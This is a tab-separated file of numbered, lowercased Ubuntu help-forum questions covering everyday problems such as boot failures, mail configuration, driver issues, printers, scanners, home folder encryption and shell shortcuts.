497734	i changed my swappiness from 60 to 10. now it boot	i was changing my swappiness from 60 to 10 , but than after i restarted it , it would not boot by normal means . also i am very new to ubuntu just started using it . gave up waiting for root device . common problems : -boot args ( cat /proc/cmdline ) -check rootdelay= ( did the systemwait long enough ) -check root= ( did the systemwait for right device ) -missing modules ( cat /proc/modeles ; is /dev alert /dev/disk/by-uuid/7c303c6e-b0c7-4da0-a80b-c256518730c0 does not exist . this is what i would get everything i boot my laptop . its a asus apsire e1-531-2453 intel b830 ( 1.8ghz 2 mb cache l3 ) 4gb ram 500gbs hdd & again this was after i changed my swappiness from 60 to 10 than restarted it .
497735	trouble sending mail	i 'm running ubuntu 12.04.1 lts . i know very little about ubuntu but have the task of administering an ubuntu server for our hospital intranet . the server is on a virtual machine running moodle . moodle sends mail fine and is set to use an smtp ip address through port 25 . however , php forms are not sending email properly . i ca n't get either of the tests mail ( 'your @ email.com ' , `` test mail '' , `` test mail from your server name '' ) ; or echo `` this is a test . '' | mail -s testing someone @ example.com to send . i installed exim4-daemon-light but i suppose i may not have configured it correctly . i have done a sudo /etc/init.d/apache2 reload . i also tried installing ssmtp but the configuration confuses me . the server has a folder etc/postfix so i presume that is installed also , so i probably have all kinds of tools , one of which just needs to be configured properly ? after installing ssmtp and changing the config , i get the error sendmail : can not open mailhub:25 can i get someone to help me troubleshoot this or help with the next troubleshooting step ? we have another vm that sends mail fine , but i ca n't find a difference in config from that one to this one - not sure where all to look though .
497740	ubuntu 14.04 lts hangs during installation	i 'm trying to install the 64bit version of 14.04 on a computer with an amd athlon 64 processor . the computer is currently running 64-bit window 7 , which i plan to dual boot with ubuntu . i downloaded the iso image , burned the image to a dvd , and booted from it . the installation process gets to the purple screen with the word ubuntu in the middle and the flashing dots below the ubuntu word . i waited for over 1/2 hour and the screen still shows the same image . i noticed the ubuntu download web page also offers a mac 64-bit version that says `` ( amd ) '' . do i need to use the mac version instead of the regular 64-bit version given the fact that my computer has an amd athlon 64 cpu ?
497744	package dependencies can not be resolved ubuntu 14.04 vlc-audacius	vlc : depends : vlc-nox ( = 2.1.4-0ubuntu14.04.1 ) but 2.1.4-0ubuntu14.04.1 is to be installed depends : libc6 ( > = 2.15 ) but 2.19-0ubuntu6 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.5.2-1ubuntu2.2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.9-20140406-0ubuntu1 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libqtgui4 ( > = 4:4.8.0 ) but 4:4.8.5+git192-g085f851+dfsg-2ubuntu4 is to be installed depends : libstdc++6 ( > = 4.6 ) but 4.8.2-19ubuntu1 is to be installed depends : zlib1g ( > = 1:1.2.3.3 ) but 1:1.2.8.dfsg-1ubuntu1 is to be installed the following packages have unmet dependencies : audacious : depends : libaudclient2 ( = 3.4.3-1 ) but 3.4.3-1 is to be installed depends : libaudcore1 ( = 3.4.3-1 ) but 3.4.3-1 is to be installed
497745	wine and chess program fritz 11 - problem with black colour	i installed chess program fritz 11 in ubuntu 12.04 using wine ( using a virtual machine virtualbox ) . the program runs perfectly but the black pieces of the main board do n't look black . if i try to change the design settings of the program i get the same problem . if a try to insert a position , black colour appears in the submenu , but when i go to the main board , black colour disappears . any clue or idea ?
497747	laptop froze , did a hard reboot and lost networking	earlier i left my laptop unattended for a few moments and when i returned to it , ubuntu had evidently frozen . this has never happened before . i did a hard reboot ( held down power button ) and restarted . when i logged back in i noticed my wifi network was n't picked up automatically . now it seems i 've lost all ability to connect to my network , either wirelessly or wired . i can see recent networks i 've join but there is no join button , only add / edit / delete . note : i did run some update scripts before i walked away from the computer . after doing some googling , i ran sudo iwconfig and that gave me eth0 no wireless extensions . lo no wireless extensions .
497748	skype : show previously hidden chat ; show text in recent chats	in the chat window ( skype > recent chats ) i have the list of contacts and groups that i 've been in touch with recently . i have right-clicked on one of the chat groups which was n't saved to my favourites and chosen 'hide chat ' . now i can not access this group from anywhere . is there a way to show hidden group chats ? also , it looks like i ca n't see any text from recent chats i 've been to . how do i access chat history ? in options > privacy i have the option to keep chat history forever selected . i 'm on ubuntu 12.04 with skype 4.2.0.11 .
497749	make the line bold or highlight on find command on vim	i know by /foo you can find and go on foo . so what i am looking for is highlighting that line . i mean when vim find foo and the courser points to foo , also highlight that line which include foo .
497750	pinta not closing	i am using pinta and when i go to close it i get an error : unhandled exception : exception has been thrown by the target of an invocation . here are the details i get : system.reflection.targetinvocationexception : exception has been thrown by the target of an invocation . -- - > system.nullreferenceexception : object reference not set to an instance of an object at pinta.core.settingsmanager.serialize ( system.string filename , system.collections.generic.dictionary`2 settings ) [ 0x00000 ] in < filename unknown > :0 at pinta.core.settingsmanager.savesettings ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow.saveusersettings ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.mainwindow. < mainwindow > m__34 ( system.object , system.eventargs ) [ 0x00000 ] in < filename unknown > :0 at pinta.core.fileactions.raisebeforequit ( ) [ 0x00000 ] in < filename unknown > :0 at pinta.actions.exitprogramaction.activated ( system.object sender , system.eventargs e ) [ 0x00000 ] in < filename unknown > :0 at ( wrapper managed-to-native ) system.reflection.monomethod : internalinvoke ( system.reflection.monomethod , object , object [ ] , system.exception & ) at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 -- - end of inner exception stack trace -- - at system.reflection.monomethod.invoke ( system.object obj , bindingflags invokeattr , system.reflection.binder binder , system.object [ ] parameters , system.globalization.cultureinfo culture ) [ 0x00000 ] in < filename unknown > :0 at system.reflection.methodbase.invoke ( system.object obj , system.object [ ] parameters ) [ 0x00000 ] in < filename unknown > :0 at system.delegate.dynamicinvokeimpl ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at system.multicastdelegate.dynamicinvokeimpl ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at system.delegate.dynamicinvoke ( system.object [ ] args ) [ 0x00000 ] in < filename unknown > :0 at glib.signal.closureinvokedcb ( system.object o , glib.closureinvokedargs args ) [ 0x00000 ] in < filename unknown > :0 at glib.signalclosure.invoke ( glib.closureinvokedargs args ) [ 0x00000 ] in < filename unknown > :0 at glib.signalclosure.marshalcallback ( intptr raw_closure , intptr return_val , uint32 n_param_vals , intptr param_values , intptr invocation_hint , intptr marshal_data ) [ 0x00000 ] in < filename unknown > :0 any help appreciated . i am using ubuntu 14.04 i tried to close it in the terminal using sudo killall pinta and the terminal says no process found .
497755	sub par wifi with 12.04 kernel 3.2.0-29 an proprietary rt3290	i have a hp pavillion 500-203a with rt3290 chipset and simply inserted by own ubuntu 12.04 disk . i successfully compiled the proprietary drivers according to this guide : http : //askubuntu.com/a/253660/22921 ( one of its alternative versions somewhere ) , but only with kernel 3.2.0-29 the connection is stable , no 3290 related messages appear in dmesg , but the connection is somewhat slower than on cable : cable connection is http : //www.speedtest.net/my-result/3624414085 wifi connection is http : //www.speedtest.net/my-result/3624419046 i find it strange that download speed is slower than upload ? any ideas on how to improve on this ?
497758	where is the `` search '' place in the file open dialog ?	i remember that in earlier versions of ubuntu there was a `` search '' place in the file open dialog ( for example like the one in this screenshot ) . however in ubuntu 14.04 , i do n't see it anymore : is it just gone , or is there an option somewhere ? thank you , - michele
497762	backup and restore question	i want to backup everything on my system , however there are some issues . there are broken system binaries , so disk imaging is not a good solution copying everything but the /bin , /sbin , /usr/bin , ect . will not work because i installed extras from apt thus not restorable on a fresh install without installing them first is there a one-step command line solution that can be done over ssh to backup/restore everything except core system binaries such as su and bash ? it has to backup users , configs , databases , ect . right now i am copying /etc , /home , /root , /opt , among others to tar them for backup and copy them back with cp -d -f -- no-preserve=mode , ownership , timestamps for restoring it sorry if there is a duplicate somewhere . i could not think of a one liner search . my google fu is not very good : -p
497765	installing and configuring mumble server	i 'm looking to setup a mumble server . i will be running it from an ubuntu 14.04 ( 64 bit ) powered vps provided by digitalocean . setup of the server seems easy , install the murmur package , however it is the configuration that is the problem . i ca n't seem to find the right guides on the internet to do the full configuration for the rooms , permissions and other things like that . would anybody be able to explain how to set up a server so it is usable and the permissions are n't screwed to the point in which people can do things they should n't be able to do , like ban or kick people . thanks in advance .
497768	is there a way to easily switch operating systems on a duel install ?	currently using ubuntu and windows 7 duel install . i am wondering if there is an easy way to switch operating systems without having to keep shutting down my computer and turning it back on .
497770	net install ( mini.iso ) via usb	i 'm trying to do a net install of ubuntu 14.04 using mini.iso by following the instructions from ubuntu installation minimal cd documentation . 64-bit pc ( amd64 , x86_64 ) ubuntu 14.04 `` trusty tahr '' minimal cd 37mb* ( md5 : 7297321c2fa6424417a548c85edd6e98 , sha1 : e1e074b4302898698977c08013e0afe5c06245e2 ) on the site , it says : new : you can make a working usb install drive with the dd cloning method with mini.iso version 13.04 . see this link and this tutorial . so i dd'ed the image to a usb drive and the installer boots up fine . as i proceed through the installation , i get this error message : -- -- [ ! ! ] install the grub boot loader on a hard disk unable to install grub in /dev/sda executing 'grub-install /dev/sda ' failed . this is a fatal error . -- -- i noticed when i was creating the partitions for the hard drive , i got this screen : [ ! ! ] partition disks note that all data on the disk you select will be erased , but not before you have confirmed that you really want to make the changes : select the disk to partition : scsi1 ( 0,0,0 ) ( sda ) - 15.6 gb stt data guardian scsi3 ( 0,0,0 ) ( sdb ) - 250.1 gb ata -- -- obviously , i want to install to my hard drive so i chose scsi3 ( sdb ) . it seems that the installer assumes that the hard drive is /dev/sda but since there is a usb key , it uses sda and grub fails to install . this is just my theory , but i 'm not sure . note that i am doing a clean install with no other partitions . does anyone have any suggestions ?
497771	gparted allocate space on the right side	i have two partitions win7/ubuntu . i 've freed some space on the win partition and i want to have ubuntu allocate that space . the problem is that the empty space is to the right of my ubuntu partition and i can not move it . how can this be done ? thanks .
497774	graphical glitch causes workspace switcher screen to be too large on my account	when i press super+s to switch workspaces , the switcher does n't expand far enough , so the workspaces are n't fully visible : notice how the top orange bar is not showing . the bottom one is also not showing when the bottom workspaces are selected . it looks as expected in the guest account . how can this be fixed ?
497778	downloading cross platform	i am trying to download ubuntu for pcs ( 64-bit ) , but the computer i need to put it on is n't working so i 'm trying to use my macbook , but every time i try to download it i get the mac version . does anyone know how i can download the pc version to disk using my mac ?
497779	do write permissions for my running daemons change if i log out ?	i have the following issue . i 'm running a daemon ( darkcoind ) which writes everything it needs to a directory under my $ home path in ~/.darkcoin . as long as i 'm logged in , everything works fine and i can follow the debug log to confirm everything works as desired . but recently i noticed the daemon seems to crash or stop always when i log out . digging into the debug log file , shows the following issue : 2014-07-14 18:16:44 *** system error : boost : :filesystem : :create_directory : permission denied : `` /home/toe/.darkcoin '' 2014-07-14 18:16:44 error : system error : boost : :filesystem : :create_directory : permission denied : `` /home/toe/.darkcoin '' it seems suddenly the daemon has not access to his working directory anymore . how is that possible ? these are the current permissions : toe @ host ~ $ ll .darkcoin/ total 7.8m 4.0k drwxrwxr-x 5 toe toe 4.0k jul 14 21:40 . 4.0k drwx -- -- -- 5 toe toe 4.0k jul 13 21:39 .. 4.0k drwxrw-r -- 3 toe toe 4.0k jul 8 19:40 blocks 4.0k drwxrw-r -- 2 toe toe 4.0k jul 14 21:49 chainstate 12k -rw-rw-r -- 1 toe toe 140 jul 8 17:52 darkcoin.conf 12k -rw-rw-r -- 1 toe toe 5 jul 14 21:49 darkcoind.pid 4.0k drwxrw-r -- 2 toe toe 4.0k jul 12 21:46 database 12k -rw-rw-r -- 1 toe toe 507 jul 13 22:42 db.log 6.8m -rw-rw-r -- 1 toe toe 6.8m jul 14 21:51 debug.log 8.0k -rw-rw-r -- 1 toe toe 0 jul 8 19:35 .lock 700k -rw-rw-r -- 1 toe toe 692k jul 14 21:40 peers.dat 296k -rw-rw-r -- 1 toe toe 284k jul 14 21:49 wallet.dat is there anything i should know about permissions changing after i log out ? this happens on an ubuntu server 14.04 lts recently installed . the server is always running and i connect through an ssh session . does that matter ? btw i have multiple similar ubuntu setups where this does not happen . what can it be ?
497782	canoscan lide 210 scans but i do n't get an image just blank gray image	originally i have a canon pixma mx892 . it prints but does not scan at all . it used to do everything in windows xp and is fairly new . i do n't want to run windows any more . sane says the mx890 is complete but maybe the mx892 is a completely different creature . finally i decided i will go out and buy a scanner that has a `` complete '' rating from sane with the exact same model number . at office depot there was a canoscan lide 210 so i bought it because it has the `` complete '' rating on simple scan it scans but i just get a light gray blank image . i installed xsane using the package manager and it does the same thing . i 'd be willing to take it back and get an hp or a epson if i knew it would plug and play and was locally available at office max , office depot , best buy etc.. but not all of hp or epson get a complete rating from sane . therefore i 'm afraid i 'll be in the same situation . i 'm new to ubuntu . i have it on 2 computers . i 've managed to run netflix and enable the cube . i 've done a little in the terminal but this scanner thing and back ends etc has me lost at the moment . canon does not have a driver . i 'm running ubuntu 14.04 . if i have to do something in terminal it will have to be step by step and hopefully not too complicated . i guess that 's all for now . hopefully someone can shed some light on this and offer a simple solution . ... ... ... ..i just found the answer . there is a mechanical lock on the underside of the scanner . just slide it from locked to unlock . it will then stop putting out blank gray images . yes i answered my own question . i tried to post this answer but could not do it for 8 hours because i 'm not a level 10 member or something like that . i put this answer in by editing my own question because i wanted others to find this answer faster . this works for the canoscan lide 210 . not sure about other models .
497787	syslog kernel ehci-pci errors ( -19 )	there are much the same error messages ( 20+ per second ! ) in my syslog : jul 14 22:17:17 laptop-joost kernel : [ 5074.090203 ] ehci-pci 0000:00:1d.0 : port 1 resume error -19 what does this message mean , and how do i solve this ? the system hangs during shut down when this messages apear . i am using ubuntu 14.04 ( gnome classic ) on an acer c720 chromebook ( chrubuntu ) .
497788	problem while installing	i am facing the issue while installing ubuntu the boot starts i get the purple screen , then after that i get the black screen and nothing after that . can anyone guide me how to undercome this issue thanks
497790	i 'm trying to run mopidy music server but the port 6600/6680 which it uses is already in use by python	i 'm trying to run mopidy music server but the port 6600/6680 which it uses is already in use by python so i closed python by using the command pkill python however that did n't close the post as it 's still in use by python : ( is there a way to close the port without having to remove python ? regards
497791	installed ubuntu 14.04 to external drive on windows 8 system . now ca n't boot windows without external disk attached ?	i have installed ubuntu 14.04 on an external usb disk drive from a windows 8 system . if i reboot the system with the external disk attached then i can successfully boot ubuntu or windows 8 . the instructions i was following seemed to indicate that upon removing the external disk drive windows would just boot as before . however i now get a grub prompt ( gnu grub version 2.02~beta2-9 ) at which i 'm not sure how to boot windows . does this mean i always have to have the external disk drive attached when i want to boot windows ? i was hoping this was n't the case . how can i allow windows to boot as before without the external drive attached but when the drive is attached allow ubuntu to be booted ? any help gratefully receive and many thanks . steve
497793	brother mfc-j470dw printer poor quality and adjusting brightness/contrast has no effect	my brother mfc-j470dw printer produces poor color prints from my linux desktop , which is running ubuntu release 14.04 . furthermore , the contrast and brightness adjustments on image viewer interface have absolutely no effect on the copy that comes out of the printer , or , for that matter , even on the image that appears in the viewer window on my screen . the drivers were installed from the brother website , and the printer seems to work ok otherwise . using the printer copy function produces reasonable copies , which can be made even better by selecting high density from the printer menu . also the printer test page comes out good with high contrast and saturated colors . so the problem appears to be in the software , which is not allowing me to adjust brightness/contrast .
497800	extremely slow acpi event propagation	a follow up to my previous question here : run a script when power button is pushed so i am able to detect acpi events and i intercept the power button press appropriately , however there is an indeterminate amount of time between the power button being pressed and the script actually running . in some cases , there is a minute-long delay between when i physically push the button and when the script gets run . in others , the script runs almost immediately after i press the button . what could cause such a delay in the event propagation ?
497801	laptop boots to a black screen after trying to install fglrx for amd hd8670m in ubuntu 12.04	i tried installing proprietary fglrx drivers by following instructions from https : //help.ubuntu.com/community/binarydriverhowto/amd however the installation failed with the error 'amdconfig : no supported adapters detected ' . now laptop boots to a purple screen followed by the black screen . i had made a backup of the xorg.conf file but replacing it does not solve the problem . i am lost . please help me get the login screen back . update as suggested i tried adding nomodeset after `` quiet splash '' in the grub-menu . however the system still boots to a black screen . here are the current grub settings : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor='lsb_release -i -s 2 > /dev/null || echo debian' grub_cmdline_linux_default= '' radeon.modeset=0 vesafb.nonsense=1 quiet splash nomodeset '' grub_cmdline_linux= '' '' kindly suggest what else can be done to rectify the problem .
497802	qbittorrent randomly shuts down ?	ubuntu 14.04 i have qbittorrent installed but it is randomly closing after a few minutes . there is no error message or anything so i am not sure why it is behaving like this . i am just beggining to learn about linux/ubuntu so as yet i do n't know much about it . edit : just ran it through the terminal and got the following : terminate called after throwing an instance of 'std : :bad_cast' what ( ) : std : :bad_cast ************************************************************* catching sigabrt , please report a bug at http : //bug.qbittorrent.org and provide the following backtrace : qbittorrent version : v3.1.8 stack trace : /lib/x86_64-linux-gnu/libc.so.6 : gsignal ( ) +0x39 [ 0x7fb15f1caf79 ] /lib/x86_64-linux-gnu/libc.so.6 : abort ( ) +0x148 [ 0x7fb15f1ce388 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 : __gnu_cxx : :__verbose_terminate_handler ( ) +0x155 [ 0x7fb15fad66b5 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 : ( ) +0x5e836 [ 0x7fb15fad4836 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 : ( ) +0x5e863 [ 0x7fb15fad4863 ] /usr/lib/x86_64-linux-gnu/libstdc++.so.6 : ( ) +0x5eaa2 [ 0x7fb15fad4aa2 ] /usr/lib/libtorrent-rasterbar.so.7 : ( ) +0xa74af [ 0x7fb161be34af ] /usr/lib/libtorrent-rasterbar.so.7 : boost : :asio : :ip : :address : :to_v4 ( ) const+0x28 [ 0x7fb161bfabc8 ] /usr/lib/libtorrent-rasterbar.so.7 : libtorrent : :socks5_stream : :socks_connect ( boost : :shared_ptr < boost : :function < void ( boost : :system : :error_code const & ) > > ) +0x7dd [ 0x7fb161d34ebd ] /usr/lib/libtorrent-rasterbar.so.7 : libtorrent : :socks5_stream : :connected ( boost : :system : :error_code const & , boost : :shared_ptr < boost : :function < void ( boost : :system : :error_code const & ) > > ) +0x1b1 [ 0x7fb161d35f41 ] /usr/lib/libtorrent-rasterbar.so.7 : ( ) +0x1fd6f5 [ 0x7fb161d396f5 ] /usr/lib/libtorrent-rasterbar.so.7 : boost : :asio : :detail : :task_io_service : :do_run_one ( boost : :asio : :detail : :scoped_lock < boost : :asio : :detail : :posix_mutex > & , boost : :asio : :detail : :task_io_service_thread_info & , boost : :system : :error_code const & ) +0x29b [ 0x7fb161bfa97b ] /usr/lib/libtorrent-rasterbar.so.7 : boost : :asio : :detail : :task_io_service : :run ( boost : :system : :error_code & ) +0xe1 [ 0x7fb161bfea31 ] /usr/lib/libtorrent-rasterbar.so.7 : libtorrent : :aux : :session_impl : :main_thread ( ) +0x3c [ 0x7fb161d158bc ] /usr/lib/libtorrent-rasterbar.so.7 : boost_asio_detail_posix_thread_function ( ) +0xf [ 0x7fb161bf327f ] /lib/x86_64-linux-gnu/libpthread.so.0 : ( ) +0x8182 [ 0x7fb161722182 ] /lib/x86_64-linux-gnu/libc.so.6 : clone ( ) +0x6d [ 0x7fb15f28f30d ] aborted ( core dumped )
497806	how to stop my connection to a network device timing out	i 'm trying to put ubuntu 14.04 on a network device by copying files from my os to a drive on the network , but every time i try to connect , i get the error `` connection timed out . '' i can only access the drive in windows , but i do n't want a hard drive overload trying to copy all of the files straight to windows . is there a way to change the connection time-out ? i use ubuntu 14.04 and can only access the location via ethernet . wi-fi fails every time .
497807	ubuntu running slow	i just installed ubuntu 14.04 on a local disk of 20 gb . ubuntu is running slow and too often freeze for a few seconds . i checked ram and cpu usage and it is normal . may be that is installed on a low space local disk ? or what else ?
497812	how do i batch copy files sequentially from one folder to another ?	i have a music player that ridiculously enough , refuses to play files according to the alphabetical and numerical order , but based upon the order in which they are copied to the audio player . as such , i have for years copied files one at a time from my music folder to the folder in the music player to ensure they keep to their playlist order . now that i have a few audio books , it would be a lot easier to automate the process explicitly with a bash script or any other solution . simply doing a ctrl-a and ctrl-v results in different files being copied and pasted at different times to the music folder . it 's a problem if this results in the last chapter of an audio book being played before it should . for example : c01.mp3 , c02.mp3 , c03.mp3 when copied to the audio player may be played in the order c03.mp3 , c01.mp3 , c02.mp3 instead of the correct numerical order . my question is , what would be the best way to simplify the process ?
497816	trouble booting with windows 8 lenovo s415	so i did all the necessary configurations in bio settings.secure boot is disabled , boot mode `` legacy support '' , boot priority `` legacy first '' , usb boot `` enabled '' . for the boo-table usb drive i used universal usb installer . every time i try to boot from my usb my screen shows the lenovo logo blinking ... ... ... ... ...
497817	how to completely purge everything that is associated with nvidia ?	i have followed endless amount of guides in order to make primus work with steam in ubuntu 14.04 and yet nothing works . i would like to completely purge everything that is associated with nvidia , bumblebee , nvidia x server , primus , prime indicator and so on . can i do so ?
497819	14.04 -- amd ( hd 6870 ) -- gpu fan 100 % during install	i am attempting to install ubuntu on my primary desktop ( a former gaming pc ) which is equipped with a sapphiretech hd6870 ( amd ) . as soon as i boot into the installation process or when i simply boot into the live cd mode ( installing it from a usb stick ) , my gpu fan will spin up to 100 % . when i simply hard reboot the pc , the fan spins right down so it does not really seem to be a temperature issue , further confirmed by the fact the fan behaves just fine when booted into windows . the temperature of the gpu is also as it has always been , so it is not a dust build-up issue . is there any way i can avoid having the fan spin up to 100 % while installing ? i have no guarantee it will start behaving normally after installation and i 'd rather avoid wasting the installation by having an unuseable situation ( 100 % on a sapphiretech hd6870 is quite loud ) .
497822	what could be the reason i only see my group in parentheses in the file manager in the owner column ?	i decided to reinstall xubuntu 14.04 lts after i botched an earlier install . after the reinstall i copied the backup i had , of my home directory , back in place ( same username , same uid ( 1000 ) , same group ( not sure about the gid though , but presumably the same as well ) ) using dd from a live usb session . if i remember correctly , in the earlier install i saw the following in the file manager 's ( thunar ) owner columns on the files i own : username ( group ) ( both have the same name in actuality ) ... just like i do for other files , not owned by me . for instance for root : root i 'd see : root ( root ) but on my new install i only see this in the owner column , when the files are owned by me : ( group ) ( the actual group name in actuality ) doing ls -al in terminal in the same folders will show the correct user for the owner column . what could be the reason i 'm only seeing the group name in parentheses now , in the owner column in thunar ? and how , if at all possible , can i fix this ?
497824	is the hp business notebook 8510p adequate to run ubuntu ?	it 's the 8510p2221207 , with intel core 2 duo @ 2.2ghz , 2gb memory and 120gb hdd . the hard drive size is totally adequate for me . best buy is selling it for $ 186 , refurbished . i want to load the latest lts version of ubuntu . this is a 2007 machine . i will visit web pages to read info , watch youtube , check email , use open office , and watch dvds both on the notebook and on a tv feed by the notebook via hdmi cable . is this notebook capable of doing that ? thanks . also , can somebody mail me a cd with the latest lts iso image ? i just heard about lubuntu . i 've used 12.04 lts and 13.04 in the past and liked both of them . thanks !
497833	ubuntu 14.04 lts accessing public wifi	i have my wired and home wireless networks set-up already but was wondering how to access public wifi access ? do i need to do something w/ the proxy configuration ? heres my wireless script printout : enter link description here
497834	when installing packages ( particularly those with graphical uis ) how do you determine which is fitting for your distribution ?	i 'm having a hard time understanding the dependencies of software on ( the combination of ) ubuntu distributions , desktop environments , window managers , file managers and what have you . what i 'm particularly worried about is that i might install software that does n't play nice with any of the aforementioned processes and that it messes up those processes and/or uses different config files , spread in different locations , etc . could you give a short overview of what elementary knowledge , about the architecture of linux systems , is needed to determine whether a software package is suitable for a particular set-up ?
497837	how add a network printer with command line to ubuntu 14.04	description : in maas i need a node with a network printer , so i need some command to add in juju install to add network printer . if there is a solution let me know . thanks
497838	how to encrypt ubuntu home drive when getting a .gvfs permission error ?	i am trying to encrypt my ubuntu 12.04 laptop after i 've already installed the os . i 've tried following a few guides online , such as http : //www.howtogeek.com/116032/how-to-encrypt-your-home-folder-after-installing-ubuntu/ i start by running this command : sudo apt-get install ecryptfs-utils cryptsetup then i add another administrator account on my laptop . then i log-out of my main account , and into my new account . from there i open a command prompt and run : sudo ecryptfs-migrate-home -u davidhunt this gives me an error message : permission denied : can not lstat into .gvfs the process then ends after logging this a number of times . i 've alternatively tried adding -- exclude=/home/davidhunt/.gvfs to the command , but this gives me an error about needing to be root . i then go root ( sudo su ) and re-run , with the same error .
497839	ca n't convert from dvd to webm	on ubuntu trusty , i ca n't convert and dvd to the webm format . i 'm using the command : mencoder -v -v dvd : //1 -ovc lavc -oac lavc -ffourcc vp80 -o output.webm -of lavf -lavfopts format=webm -lavcopts vcodec=libvpx -lavcopts acodec=vorbis and get the error output : 94 -- enable-libfreetype -- enable-frei0r -- enable-gnutls -- enable-libgsm -- enable-libmp3lame -- enable-librtmp -- enable-libopenjpeg -- enable-libopus -- enable-libpulse -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-vaapi -- enable-vdpau -- enable-libvorbis -- enable-libvpx -- enable-zlib -- enable-gpl -- enable-swscale -- enable-libcdio -- enable-x11grab -- enable-libx264 -- enable-libxvid -- shlibdir=/usr/lib/i386-linux-gnu/i686/cmov -- cpu=i686 -- enable-shared -- disable-static ** muxer_lavf ***************************************************************** remember : mencoder 's libavformat muxing is presently broken and can generate incorrect files in the presence of b-frames . moreover , due to bugs mplayer will play these incorrect files as if nothing were wrong ! ******************************************************************************* ok , exit . allocated stream n. 1 , type=0 opening video filter : [ expand osd=1 ] expand : -1 x -1 , -1 ; -1 , osd : 1 , aspect : 0.000000 , round : 1 opening video filter : [ scale w=480 h=-3 ] swscale params : 480 x -3 ( -1=no scaling ) ========================================================================== opening video decoder : [ ffmpeg ] ffmpeg 's libavcodec codec family libavcodec.size : 0 x 0 info : libavcodec init ok ! selected video codec : [ ffmpeg2 ] vfm : ffmpeg ( ffmpeg mpeg-2 ) ========================================================================== forcing output fourcc to 30385056 [ vp80 ] . allocated stream n. 2 , type=1 building audio filter chain for 48000hz/2ch/floatle - > 0hz/0ch/ ? ? ... [ libaf ] adding filter dummy [ dummy ] was reinitialized : 48000hz/2ch/floatle [ dummy ] was reinitialized : 48000hz/2ch/floatle unsupported avsampleformat 8 unsupported avsampleformat 8 could n't open codec vorbis , br=224 .
497845	support to amd radeonâ˘ hd 8970m	a week ago i installed ubuntu 14.04 on my laptop , but it started overheating . reading the forums , i noticed that the amd radeon hd 8970m has does n't support this os , the computer was working on integrated graphics alone . i checked in the additional drivers utility and it only found the integrated graphics card . is there a way to use this graphics card on ubuntu ?
497849	i am trying to install android studio but i have this problem	i 'm trying to open studio.sh but i am having this problem osama @ osama-hp-pc : ~/android-studio/bin $ ./studio.sh bash : ./studio.sh : permission denied osama @ osama-hp-pc : ~/android-studio/bin $ sudo ./studio.sh [ sudo ] password for osama : sudo : ./studio.sh : command not found osama @ osama-hp-pc : ~/android-studio/bin $
497850	eth0 no-carrier , ifconfig shows no ip address	i left ubuntu and came back after a while so i do n't remember much . now i 'm trying to get my ip address . all i 'm getting from running ifconfig is eth0 link encap : ethernet hwaddr 3c:97:0e:11:22:0d up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:20 memory : f2500000-f2520000 ( btw , i do n't really understand what up broadcast multicast means . ) $ sudo ifdown eth0 ifdown : interface eth0 not configured then $ sudo ifup eth0 ignoring unknown interface eth0=eth0 and finally 2 : $ ip addr show eth0 eth0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc pfifo_fast state down group default qlen 1000 link/ether 3c:97:0e:11:22:0d brd ff : ff : ff : ff : ff : ff
497851	list files appended with an order number	is there a quick way to list all the files from a location having an appended order number ? something like : ls -a generates the result : 1 file a 2 file b ... 100 file whatever thanks . p.s . i need this because i am exporting a list to a file , and i have to analyse those files , and it would help me to be able to identify the files .
497854	find and remove a system-wide keyboard shortcut	after updating to xubuntu 14.04 the other day , i noticed ctrl + space stopped working in both eclipse and netbeans , but i can not find where it 's bound . nor does it appear to do anything . i have looked in the settings manager on the keyboard , window manager , and settings editor ( xfce-specific ) applets , but none of the commands are bound to that combination . is there another applet that defines system-wide shortcuts ?
497855	nouveau on 2013 15 '' macbook 14.04 crashes on resume	i have a 2013 macbook pro 15 '' ( macbook 11,3 ) . my laptop works perfectly fine except awaking from suspend . i can see the screen , the keyboard does not work after waking up and my laptop ( at least my mouse ) freezes after 30 seconds after waking up . nvidia drivers work perfectly fine for suspend and resume . but the nvidia drivers have low resolution during bootup and my brigtness can not be adjusted using nvidia drivers . i am attaching the xorg.0.log log file that has the error message with the crash of the driver . my options : ( preferred ) identify why this is failing and fix the nouveau driver . fix the nvidia brightness issue ( from googling this seems to be an easier fix , but i prefer to use the nouveau driver ) live with nvidia driver without adjusting my screen brightness ( a little difficult situation ) use nouveau but shutdown my laptop every time instead of suspending . a very difficult situation to accept in today 's world .
497856	sades gaming headset	i have a sades 7.1 surround sound gaming headset . it came with software to manage the surround sound and mic . how do i install the software from the disk onto my computer ?
497857	can not install ubuntu 14.04 64bit	i got a new computer and am looking to dual-boot ubuntu and windows 7 . i have my partition made ( 50gb ) , and my 64bit boot disk made but when i try booting from it i just get a black screen , with the underscore . i can still use my old boot disk with version 11 of ubuntu but its 32bit . i have tried looking for a solution , i extracted the .iso to a folder and i get the error `` the version of this file is not compatible with the version of windows . etc ... '' when i run the wubi.exe , but yet the old 32bit wubi.exe still runs when i do the same thing . i would like to install the 64bit version now but i 'm not sure what to do next .
497859	combine 2 commands into 1 custom command ?	i want a custom command named something like `` serverstart '' or something which is a combination of two commands , one after the other . the first command would be cd .server the second being java -xmx7168m -xms7168m -jar server.jar how do i do this so this becomes one terminal command ?
